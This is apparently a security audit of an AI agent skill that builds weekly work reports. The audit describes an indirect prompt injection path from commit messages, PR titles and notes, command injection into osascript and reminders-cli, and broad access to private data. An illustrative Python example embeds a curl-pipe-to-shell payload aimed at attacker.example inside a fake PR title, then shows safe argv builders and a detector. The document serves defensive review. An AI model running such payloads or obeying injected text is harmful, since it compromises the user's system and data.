weekly-report
Warn
Audited by Gen Agent Trust Hub on Mar 25, 2026
Risk Level: MEDIUM
COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [PROMPT_INJECTION]: Indirect prompt injection surface detected. The skill ingests data from external sources that influences its behavior during report generation and automated scheduling.
  - Ingestion points: local git repositories (~/code/), GitHub PR/issue titles via the gh CLI, and personal Obsidian daily notes.
  - Boundary markers: absent. The skill does not delimit retrieved work logs or commit messages, and gives the model no instruction to ignore commands embedded in them.
  - Capability inventory: execution of shell commands (git, reminders-cli), AppleScript (osascript), and network requests (gh).
  - Sanitization: absent. Content from external sources is interpolated directly into script templates without validation or escaping.
- [COMMAND_EXECUTION]: The skill generates and executes scripts dynamically using data derived from external sources.
  - Evidence: In Step 6, project names and task descriptions are extracted from the draft and interpolated into AppleScript code for osascript and into shell commands for reminders-cli to create events and tasks.
  - Potential for injection: Maliciously crafted data in a git commit or GitHub PR (e.g., containing quotes or control characters) could break out of the intended script syntax and execute unauthorized actions on the user's system.
- [DATA_EXFILTRATION]: The skill requires broad access to the user's local and remote work history.
  - Evidence: The skill reads local monorepo workspaces, git logs, and the user's private Obsidian vault (~/Library/Mobile Documents/iCloud~md~obsidian/).
  - Context: While this access is central to the skill's purpose, placing personal documentation and repository history in the agent's context increases the impact of any prompt injection or compromise.
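The COMMAND_EXECUTION finding above is easiest to see with a concrete title. The following is an added example, not code from the audit or from the weekly-report skill: it builds the osascript and reminders-cli invocations the way the audit describes (untrusted text formatted into script source), next to a builder that passes the same text as a process argument so it never reaches code position. The sample PR title is constructed; the reminders-cli argument order and the Reminders AppleScript are assumptions for illustration.

```python
# Added example (not the audit's or the skill's own code): the interpolation
# bug described in the COMMAND_EXECUTION finding, beside a hardened builder.
# Assumed for illustration: the reminders-cli argument order and the AppleScript
# used to create a reminder.
import re
import shlex

# Constructed sample inputs standing in for a GitHub PR title or commit subject.
MALICIOUS_TITLE = (
    'Fix login bug" & (do shell script "curl https://attacker.example/p | sh") & "'
)
BENIGN_TITLE = 'Refactor auth module (Q1 "cleanup" pass)'


# --- Vulnerable pattern: untrusted text formatted straight into the script ----
def naive_applescript(title: str) -> str:
    """Build AppleScript source by string formatting (the pattern the audit flags)."""
    return ('tell application "Reminders" to make new reminder '
            f'with properties {{name:"{title}"}}')


def naive_shell(title: str) -> str:
    """Shell command line with the title dropped in unquoted."""
    return f"reminders add Work {title}"


# --- Hardened pattern: data travels as argv, the code stays constant ----------
SAFE_SCRIPT = (
    "on run argv\n"
    "  set t to item 1 of argv\n"
    '  tell application "Reminders" to make new reminder with properties {name:t}\n'
    "end run"
)


def safe_osascript_argv(title: str) -> list:
    """argv for subprocess.run(argv) with no shell: fixed script, title as a parameter."""
    return ["osascript", "-e", SAFE_SCRIPT, title]


def safe_reminders_argv(title: str, list_name: str = "Work") -> list:
    """argv for reminders-cli (assumed order); as a list it never reaches /bin/sh."""
    return ["reminders", "add", list_name, title]


def applescript_string_literal(s: str) -> str:
    """Fallback when argv is impossible: escape backslash and quote, strip line breaks."""
    s = s.replace("\\", "\\\\").replace('"', '\\"')
    return '"' + re.sub(r"[\r\n]", " ", s) + '"'


# --- A check for generated scripts: does ingested text reach code position? ---
def code_outside_strings(script: str) -> str:
    """Return the parts of AppleScript source that lie outside string literals."""
    out, in_str, i = [], False, 0
    while i < len(script):
        c = script[i]
        if in_str:
            if c == "\\":          # skip the escaped character
                i += 2
                continue
            if c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


def has_injected_shell(script: str) -> bool:
    """True when a 'do shell script' call appears at code level, i.e. was injected."""
    return "do shell script" in code_outside_strings(script)


if __name__ == "__main__":
    print("naive:", has_injected_shell(naive_applescript(MALICIOUS_TITLE)))    # True
    print("escaped:", has_injected_shell(
        "set n to " + applescript_string_literal(MALICIOUS_TITLE)))            # False
    print(shlex.join(safe_reminders_argv(MALICIOUS_TITLE)))
```

Note that even the benign title breaks the naive template: its embedded quotes end the string literal early, so "cleanup" lands in code position. The argv route avoids both the syntax break and the injection because the script text is a constant and the title is only ever a parameter; escaping is the second-best option and still needs the control-character stripping shown.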
Audit Metadata